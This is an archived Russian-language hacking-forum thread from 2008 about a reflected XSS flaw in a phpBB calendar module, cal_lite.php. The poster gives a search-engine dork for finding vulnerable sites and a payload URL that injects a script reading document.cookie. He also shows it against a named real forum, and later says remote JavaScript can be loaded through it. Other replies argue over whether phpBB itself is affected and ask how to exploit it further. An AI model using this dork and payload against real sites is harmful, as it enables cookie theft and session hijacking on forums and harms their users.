Просмотр полной версии : xss в модуле cal_lite.php \PhpBB\
ReVOLVeR
15.03.2008, 22:22
inurl:cal_lite.php
cal_lite.php?id=12&mode=display&cl_d=%3Cscript%3Ealert(document.cookie)%3C/script%3E&cl_m=11&cl_y=2007
ReVOLVeR
15.03.2008, 22:26
к примеру
_http://www.airsoftgun.ru/phpBB/cal_lite.php??id=12&mode=display&cl_d=%3Cscript%3Ealert(document.cookie)%3C/script%3E&cl_m=11&cl_y=2007
Название темы не отвечает содержимому.
XSS не в phpbb а в модуле который использует этот cal_lite.php, тк на большинстве форумах его нету.
ReVOLVeR
15.03.2008, 22:33
Zedobat модуль чего модуль форума phpbb + разводиш флэйм в теме на это есть болталка..
ТС каким образом можно дальше юзать xss.
Распиши пожалуйста.Обьясни.
fucker"ok
15.03.2008, 22:38
Такого файла нет ни в phpbb 2.x ни в 3.x.
ReVOLVeR
15.03.2008, 22:38
fucker"ok это модуль...
xss in phpBB all version
inurl:cal_lite.php - Результаты 1 - 10 из примерно 9 580
powered by phpbb - Результаты 1 - 10 из примерно 9 890 000
И где же "in phpBB all version" ?
ReVOLVeR
15.03.2008, 22:41
Zedobat хочь название поменяю???
будет легче???
выходит сообщение с путем в адресной строке и сообщение на форуме "На текущую дату Событий нет" ! что это означает ? что дальше делать ?
ReVOLVeR
15.03.2008, 22:45
a1ex Подгружается удалённый JS
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot